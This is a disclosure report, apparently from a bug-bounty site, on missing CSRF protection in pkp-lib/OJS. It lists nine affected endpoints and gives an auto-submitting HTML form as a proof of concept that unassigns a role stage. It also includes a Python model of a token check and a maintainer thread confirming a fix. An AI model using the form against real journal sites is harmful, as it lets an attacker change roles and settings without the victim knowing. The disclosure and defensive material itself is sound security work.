Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 5th 2021


Description

Missing CSRF token in role stage assignment, save language settings, and task notification

1: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5

2: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/assign-stage?stageId=1&userGroupId=5

3: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/languages/manage-language-grid/save-language-setting?rowId=en_US&setting=supportedLocales&value=

4: http://10.0.2.15/index.php/index/admin/clearDataCache

5: http://10.0.2.15/index.php/index/admin/clearTemplateCache

6: http://10.0.2.15/index.php/index/admin/clearScheduledTaskLogFiles

7: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-read?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

8: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-new?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

9: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/delete?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

Proof of Concept

Example: Unassign stage

Open the index.html:

<html>
  <body>
    <!-- Auto-submitting form: the victim's browser attaches its OJS session
         cookie to this cross-site POST, and the handler asks for no token -->
    <form action="http://[OJS-IP+PORT]/ojs/index.php/[JOURNAL_NAME]/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5" method="POST">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of changing user role stage assignments and changing language settings for forms.

Occurrences

missing csrf validation for language settings

missing csrf validation for clear scheduled task

missing validation of csrf in mark read

Missing csrf tokens for the 3 admin control actions

missing csrf token in assign / unassign stage form

missing csrf validation for clear data cache

missing validation of csrf in mark new

missing validation of csrf in delete
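As an added illustration of the missing control (this is not pkp-lib code and is not part of the report), the following Python model shows a synchronizer-token check applied to the handler paths listed above. The Session and Request classes, the dispatch() routine and the form field name csrfToken are assumptions made for the example; the handler paths and the proof-of-concept URL are copied from the report.

```python
# Added example (not pkp-lib code): a minimal synchronizer-token CSRF check
# modelled against the handler paths listed in the report. The Session,
# Request and dispatch() shapes are hypothetical; the form field name
# "csrfToken" is an assumption.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple
from urllib.parse import urlsplit


@dataclass
class Session:
    """Server-side session; the CSRF token is minted once per session."""
    user_id: int
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    url: str
    session: Session        # resolved from the cookie the browser attached
    form: Dict[str, str]    # POST body fields


# Handler paths from the report that change state; each must require a token.
STATE_CHANGING = {
    "/grid/settings/roles/user-group-grid/unassign-stage",
    "/grid/settings/roles/user-group-grid/assign-stage",
    "/grid/settings/languages/manage-language-grid/save-language-setting",
    "/admin/clearDataCache",
    "/admin/clearTemplateCache",
    "/admin/clearScheduledTaskLogFiles",
    "/grid/notifications/task-notifications-grid/mark-read",
    "/grid/notifications/task-notifications-grid/mark-new",
    "/grid/notifications/task-notifications-grid/delete",
}

# The URL targeted by the report's proof-of-concept form (copied from it).
POC_URL = ("http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/"
           "user-group-grid/unassign-stage?stageId=1&userGroupId=5")


def handler_path(url: str) -> str:
    """Strip '/index.php/<context>/' and an optional '$$$call$$$' segment so
    the remaining path names the handler regardless of journal context."""
    path = urlsplit(url).path
    _, _, rest = path.partition("/index.php/")
    parts = rest.split("/")[1:]          # drop the context ("e", "index", ...)
    if parts and parts[0] == "$$$call$$$":
        parts = parts[1:]
    return "/" + "/".join(parts)


def csrf_ok(req: Request) -> bool:
    """Accept only when the submitted token equals the one bound to the
    caller's own session. A cross-site form cannot read that value, and a
    token minted for a different session does not match."""
    submitted = req.form.get("csrfToken", "")
    return hmac.compare_digest(submitted.encode(), req.session.csrf_token.encode())


def dispatch(req: Request) -> Tuple[int, str]:
    """Run the check before every state-changing handler."""
    path = handler_path(req.url)
    if path in STATE_CHANGING:
        if req.method != "POST":
            return 405, "state change must be a POST"
        if not csrf_ok(req):
            return 403, "missing or invalid CSRF token"
    return 200, "handled " + path


def demo() -> Dict[str, int]:
    """Replay three constructed requests against the unassign-stage handler."""
    victim = Session(user_id=7)
    attacker = Session(user_id=99)
    forged = Request("POST", POC_URL, victim, {})                              # the PoC form: no token
    legit = Request("POST", POC_URL, victim, {"csrfToken": victim.csrf_token})  # token from victim's own page
    replay = Request("POST", POC_URL, victim, {"csrfToken": attacker.csrf_token})  # token of another session
    return {
        "forged_form_without_token": dispatch(forged)[0],
        "same_session_token": dispatch(legit)[0],
        "token_from_another_session": dispatch(replay)[0],
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: HTTP {status}")
```

In this model the token is emitted as a hidden field wherever a form posts to one of the listed handlers and checked once in the dispatcher, so the PoC form above (which carries no token) is refused with 403 while the same request from the victim's own page succeeds. Rejecting non-POST requests to these handlers also closes the query-string variants in the report, which a plain link or image tag could otherwise trigger.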

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
haxatron modified their report
2 months ago
haxatron
2 months ago

Researcher


Hi @admin, maintainers have updated SECURITY.md at https://github.com/pkp/ojs/blob/main/SECURITY.md

Jamie Slome
2 months ago

Admin


I have left a comment on the GitHub Issue.

Alec Smecher validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher
2 months ago

I have filed this at https://github.com/pkp/pkp-lib/issues/7371 and will work on a fix. I'm not familiar with this website's model and left the bounty amount selection at its default.

haxatron
2 months ago

Researcher


Thanks for validating this report!

Alec Smecher confirmed that a fix has been merged on 62c07e 2 months ago
Alec Smecher has been awarded the fix bounty
userGroupForm.tpl#L11-L65 has been validated
index.tpl#L35-L37 has been validated